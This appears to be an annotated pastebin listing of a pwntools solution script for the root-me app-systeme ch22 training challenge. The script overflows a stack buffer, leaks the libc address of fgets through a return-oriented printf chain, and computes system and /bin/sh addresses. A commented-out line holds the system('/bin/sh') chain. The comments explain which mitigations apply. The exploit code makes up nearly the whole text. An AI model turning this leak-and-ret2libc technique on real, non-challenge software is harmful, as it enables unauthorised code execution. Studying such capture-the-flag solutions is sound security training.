  1. app-systeme-ch22@challenge03:~$ python -c '
  # Pastebin listing of a pwntools solution script for the root-me app-systeme
  # ch22 training challenge, run inline via python -c on the challenge host.
  # Defender notes (inferred from the constants below; confirm with checksec):
  #   - every address is a fixed 0x0804xxxx value, which only holds for a
  #     non-PIE 32-bit binary; PIE would invalidate the gadget and GOT addresses.
  #   - the libc address is read from a GOT entry at runtime, so libc ASLR alone
  #     is not a mitigation here; the real control is the stack overflow itself.
  #   - the system / binsh / exit / printf deltas are tied to one libc build and
  #     are not portable across hosts.
  2. from pwn import *
  3. from time import sleep
  4.  
  # ELF() parses the challenge binary so symbol and GOT addresses can be read from it.
  5. b = ELF("/challenge/app-systeme/ch22/ch22")
  # Filler written before the overwritten return address; 48 is the offset the
  # script author chose (not derived here).
  6. sled = 48 * "n"
  # Return to main after the first chain so a second line of input is accepted.
  7. addrmain = p32(b.symbols["main"])
  8. #addrmain = p32(0x080485a4)
  9. #addrmain = p32(0x80485b1)
  10.  
  # Hard-coded .bss, stdin and gadget addresses taken from the challenge binary.
  # bss, size, stdin and gadget_call_eax are defined but not used in the chains below.
  11. bss = p32(0x0804a020)
  12. size = p32(0x10)
  13. stdin = p32(0x0804a024)
  14. gadget_pop_ebx = p32(0x08048573)
  15. gadget_call_eax = p32(0x0804859f)
  16.  
  17. fgets = p32(b.symbols["got.fgets"])
  18. printf = p32(b.symbols["printf"])
  19. context.log_level = 2
  # Stage 1 chain: printf(got.fgets) prints the resolved libc address of fgets,
  # the pop-ebx gadget discards the argument, then execution returns to main.
  20. pay = sled + printf + gadget_pop_ebx +fgets + gadget_pop_ebx + addrmain #+"\naaa"
  21.  
  # Local process; the remote and gdb variants are left commented out.
  22. p = process("/challenge/app-systeme/ch22/ch22")
  23. #p = remote("challenge03.root-me.org",56522)
  24. #p=gdb.debug("/challenge/app-systeme/ch22/ch22")
  25.  
  26. context.timeout=100000
  27. p.recv(timeout=1)
  28.  
  29. p.sendline(pay)
  30. buf = p.recvline(timeout=1)
  31. p.sendline("")
  32. buf = p.recvline(timeout=1)
  33. log.info(buf)
  34.  
  # The first four bytes of the printed line are the runtime fgets address;
  # the remaining symbols are fixed deltas from it for the libc build in use.
  35. leak_fgets = u32(buf[0:4])
  36. leak_system = leak_fgets - 0x28db0
  37. leak_binsh = leak_fgets+0x11811F
  38. leak_exit = leak_fgets-0x35be0
  39. leak_printf = leak_fgets - 0x14ce0
  40.  
  41. log.info("Leak got fgets: "+str(hex(leak_fgets)))
  42. log.info("Leak calculate system: "+str(hex(leak_system)))
  43. log.info("Leak /bin/sh: "+str(hex(leak_binsh)))
  44.  
  # Second round: as written the same leak payload is sent again; the
  # alternative chain on the commented line is not used.
  45. #pay = sled + p32(leak_system) + gadget_pop_ebx +p32(leak_binsh) +addrmain
  46. p.sendline(pay)
  47. buf = p.recvline(timeout=1)
  48. p.sendline("")
  49. buf = p.recvline(timeout=1)
  50. log.info(buf)
  51. p.interactive()
  52. '